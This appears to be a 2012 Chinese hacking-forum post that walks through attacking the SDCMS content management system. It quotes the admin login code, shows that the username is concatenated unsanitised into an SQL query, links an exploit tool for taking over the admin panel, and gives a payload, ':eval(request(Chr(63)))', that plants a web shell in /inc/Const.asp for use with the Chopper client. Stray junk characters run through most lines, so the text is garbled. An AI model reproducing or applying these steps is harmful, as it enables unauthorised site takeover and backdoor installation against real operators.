作者:T00LS 鬼哥
" l- Q1 f6 c% Z2 o W漏洞文件:后台目录/index.asp
: x$ b2 J& y& F/ ]2 o4 \- n1 j3 m- ^( I/ X' }2 H; x7 A" e/ S
Sub Check% h2 U1 U+ `( b s/ ]
Dim username,password,code,getcode,Rs/ J: m z) @: r: @
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
7 Q1 |, f' ]% V username=FilterText(Trim(Request.Form("username")),1). g; V. O" w6 x" K" G L9 u' U' W
password=FilterText(Trim(Request.Form("password")),1)) S0 V* o- t# ^7 N, h5 m% m
code=Trim(Request.Form("yzm"))
( h; n0 `& x/ P4 ]( C' I5 S getcode=Session("SDCMSCode")
& H* P; Y7 z& I$ j IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
' w: j! A! V2 k IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
1 E3 m4 a" C; U& a ~6 ^" ] IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied' `0 c' H! J. `: b5 A$ P# x3 g
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
* b& \7 N4 \0 B, v2 P2 C$ M5 H IF username="" or password="" Then& h2 y" |7 F* q0 ]3 K' j* S
Echo "用户名或密码不能为空"ied: j; Y; _ S5 a$ D: ?( u+ A
Else
! h$ d/ @* w' \& G$ K5 a Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")& Q0 d; j( L7 |# x8 m& g
IF Rs.Eof Then
$ A" s, M: }8 l; h3 X0 ^5 a AddLog username,GetIp,"登录失败",1
: I$ n, S& C. n5 _: P Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"" I2 I& a0 t* C3 n7 C
Else K+ b: b% o+ U. x& x, M
Add_Cookies "sdcms_id",Rs(0)2 U3 n. U' U m% F: a: g& L
Add_Cookies "sdcms_name",username
- a7 g S* z/ ~- _0 K Add_Cookies "sdcms_pwd",Rs(2)
& b/ n+ F- {; e3 x, V$ l Add_Cookies "sdcms_admin",Rs(3), U6 d2 @' Q$ F/ h
Add_Cookies "sdcms_alllever",Rs(4)
" i* u4 A2 d1 W0 i( ^1 B& e* y Add_Cookies "sdcms_infolever",Rs(5)
0 U; E# }* j0 Q0 n/ f$ r0 v' J* b Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
! }- w3 X; n X/ M% {3 ^2 U# x AddLog username,GetIp,"登录成功",1
( g3 J1 [) a( g3 v- f+ ? '自动删除30天前的Log记录* V2 ]4 J# y0 M, N b
IF Sdcms_DataType Then
8 P! H0 a2 l; t/ ?! H Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
9 N! F' X+ x5 T, q& e0 [7 F; X Else
" d9 K u& A4 f; g* R7 S7 X Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30"), y4 L' F( c" @+ z3 _8 [3 m* H$ S9 A
End IF
9 y/ D+ I( L2 r: b Go("sdcms_index.asp"); |2 G$ O7 t. I! K
End IF( D0 r9 z: ~. R, {
Rs.Close, x* u7 P& e0 J: L( B6 K
Set Rs=Nothing
; p( U7 t& i$ P+ G% `8 P3 x# ~1 { End IF
) O1 O8 o, r! e. o9 CEnd Sub
7 v, S8 M2 [% p. `$ d- y, G
9 \6 U3 t/ a- J! l& c. R/ x. {’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码7 j# ]6 ^3 j' J: }! \7 P
1 P9 [/ i# A, s5 F- F5 y
Function FilterText(ByVal t0,ByVal t1)8 e' O7 M% _" S7 x* G# ~3 i3 W
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function$ G3 m1 b. c$ o, P! T2 _
t0=Trim(t0)) ?# ~9 J/ @/ G, x& q" {' d9 _
Select Case t1
. E# w: ]7 h/ b" c8 I. w Case "1"
- F0 K! y# [. K t0=Replace(t0,Chr(32),"")) ]6 e( r) L' l: e. C Q1 [" L
t0=Replace(t0,Chr(13),"")
F! z. g# m* |+ Y+ \8 Q t0=Replace(t0,Chr(10)&Chr(10),"")
! |( P7 \& L a* E4 C7 U9 u8 w t0=Replace(t0,Chr(10),"")
/ S% \1 D4 D2 c8 M3 i Case "2"
5 I7 k* z. d" G3 \' ` t0=Replace(t0,Chr(8),"")'回格
5 c( L/ ~: O4 M t0=Replace(t0,Chr(9),"")'tab(水平制表符)
1 w' q" m Y6 O' J t0=Replace(t0,Chr(10),"")'换行3 h+ R7 _3 K! G7 Q
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)/ T& j6 K) j7 f" T- F+ O; d, t$ }
t0=Replace(t0,Chr(12),"")'换页( N6 F3 u" G6 `6 v$ G
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合 y/ c* r+ F" f, p3 d; |
t0=Replace(t0,Chr(22),"")
2 K2 s, r" n- F `% v6 k9 v! z t0=Replace(t0,Chr(32),"")'空格 SPACE# } d+ d/ B2 c N7 p& Z* Z
t0=Replace(t0,Chr(33),"")'!! R) z. `* J O. {. U1 h# M
t0=Replace(t0,Chr(34),"")'"% s0 w0 [. v& d- B, r
t0=Replace(t0,Chr(35),"")'#
& A, k. F- P/ y3 l0 M t0=Replace(t0,Chr(36),"")'$
$ I4 a& W; ]4 z t0=Replace(t0,Chr(37),"")'%
7 z5 K' g* B* Y3 i0 O t0=Replace(t0,Chr(38),"")'&7 A1 |$ H. W0 j9 C' {# H
t0=Replace(t0,Chr(39),"")'', |2 a: a( H: Y# j8 ^
t0=Replace(t0,Chr(40),"")'(0 G, ?/ t+ C" W. j9 Q' A Q% k2 z* J/ _
t0=Replace(t0,Chr(41),"")')( f( ?$ F2 k9 {+ a. Z5 M
t0=Replace(t0,Chr(42),"")'*
2 e/ g* b& {2 u2 _7 G- r1 t t0=Replace(t0,Chr(43),"")'+3 u9 \1 D0 {% T$ ~) Z4 S; J
t0=Replace(t0,Chr(44),"")',
, c2 X3 S2 X6 p. O6 T& X t0=Replace(t0,Chr(45),"")'-/ B! d" p) \( @: q; {) t0 e% P
t0=Replace(t0,Chr(46),"")'.$ t4 H5 }9 K* ~, { @6 l
t0=Replace(t0,Chr(47),"")'/
, L: p1 c0 p6 V1 C3 ]) y t0=Replace(t0,Chr(58),"")':
9 z, K3 k; E6 R0 s t0=Replace(t0,Chr(59),"")';; o2 B9 X# v- {$ ?
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
, v; a3 z w, E7 M% T t0=Replace(t0,Chr(63),"")'?
- z0 T. i- y- z% x3 z9 @ t0=Replace(t0,Chr(64),"")'@8 m- ?+ \ x2 o/ _% ^1 E, V- K
t0=Replace(t0,Chr(91),"")'\+ \ i- ~8 n/ V& B9 m
t0=Replace(t0,Chr(92),"")'\, i! O% _" r0 \6 A n
t0=Replace(t0,Chr(93),"")']2 J7 }7 \/ S9 V! K' h. r$ }$ f- X
t0=Replace(t0,Chr(94),"")'^
" W1 K( \+ h8 W0 ` t0=Replace(t0,Chr(95),"")'_3 k1 F4 v6 T% y$ c; N- x6 g! R
t0=Replace(t0,Chr(96),"")'`1 I- n( O% Y* T( t7 t
t0=Replace(t0,Chr(123),"")'{
, h) r+ U( t1 s9 j# l5 ~ t0=Replace(t0,Chr(124),"")'|6 M( a( W5 Y% ?% P" M) F# ~
t0=Replace(t0,Chr(125),"")'}5 E/ x1 S. Q4 c8 N3 @
t0=Replace(t0,Chr(126),"")'~
# V* Q% t2 \$ E S: l8 e( M Case Else
! j/ i9 [+ ^2 m% A2 U t0=Replace(t0, "&", "&"), K- D* Z7 W( N- J8 _) O) b$ B* Z. b
t0=Replace(t0, "'", "'")
$ Y8 ?4 I7 A5 V5 H) F7 @ t0=Replace(t0, """", """)1 M* r" p6 a, a. A
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
0 @! v9 x& m8 B- l { End Select* o9 c7 b) {0 e5 g0 x* X3 U# H
IF Instr(Lcase(t0),"expression")>0 Then
& I" U" k) `9 H+ b t0=Replace(t0,"expression","e­xpression", 1, -1, 0)# F. ]% @, P, c0 n
End If4 m7 p k/ y; p4 u
FilterText=t0
6 ]! A0 t+ Q7 A6 s8 k8 L5 oEnd Function# a4 e+ I& H$ Q/ `
3 `. |' W4 K# o' \, v看到没。直接参数是1 只过滤
( s) c, W. b6 s7 d t0=Replace(t0,Chr(32)," ")4 q' z; t( P2 l. l U
t0=Replace(t0,Chr(13),"")
9 g, M, T2 Y9 a9 x% c1 { t0=Replace(t0,Chr(10)&Chr(10),"
3 P. D# ^% c+ ?: R")& _) i, l" K' T$ h* w/ u8 b! _& a( V
t0=Replace(t0,Chr(10),"" B; e* v! R# O% J' ?
")/ N: {7 N' l) o! c$ f. C/ P2 S
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!2 q+ A) w: u/ a% a' w; j
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP# U6 w- I2 V& _) w+ V
( t0 W8 I, c2 |& D. S! s4 o
测试:* {6 N' l- J% ^: P
) N# ]) r4 W/ I( I1 y+ Y
7 Z+ Q$ v5 _0 i% v+ Y- x, S2 B, i现在输入工具上验证码,然后点OK
1 o; P' \: i% V/ G" F2 F2 S) \1 v: Q- x+ [* u8 O
0 }/ s$ m; s$ {
看到我们直接进入后台管理界面了,呵呵!/ J( i# \: h4 ]
) h/ ?0 w$ a: S" y0 |+ D- ]7 E/ ]9 M% _5 `& M+ q
# ]6 f) C* }1 V8 U' L这样直接进入后台了。。。。
0 ~& f& X0 ^% b0 G# n1 J" W7 |" r9 c# ]3 G* ]" W' j" C. U
9 B6 S9 O: D; ~
6 V+ x1 I" j0 g4 i8 ]SDCMS提权:
6 _( G( N- w, k1 v& x) q# D! f8 v% A' ?$ k1 a
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?; {2 Q2 A; Y4 L7 z3 k6 U6 k
# |( A% y5 z" w& c5 K
, s0 `; J: u& f- W) \, D
9 m* y# L S: ]) j5 O- O" HOK,现在用菜刀连接下!
; W h# m7 q3 Y' O2 Z' J0 v* _& s8 g. V& F8 H' Z' x+ t7 b
- R4 ^: `- u' U( m" m( K! e" L! t3 M" @. n7 G; C7 |8 x- D
- Y3 C ?+ Q/ w6 J! @* P) z" g
8 r/ u8 l& |0 i4 w9 W |
发表于 2012-11-9 20:57:02
收藏
支持
反对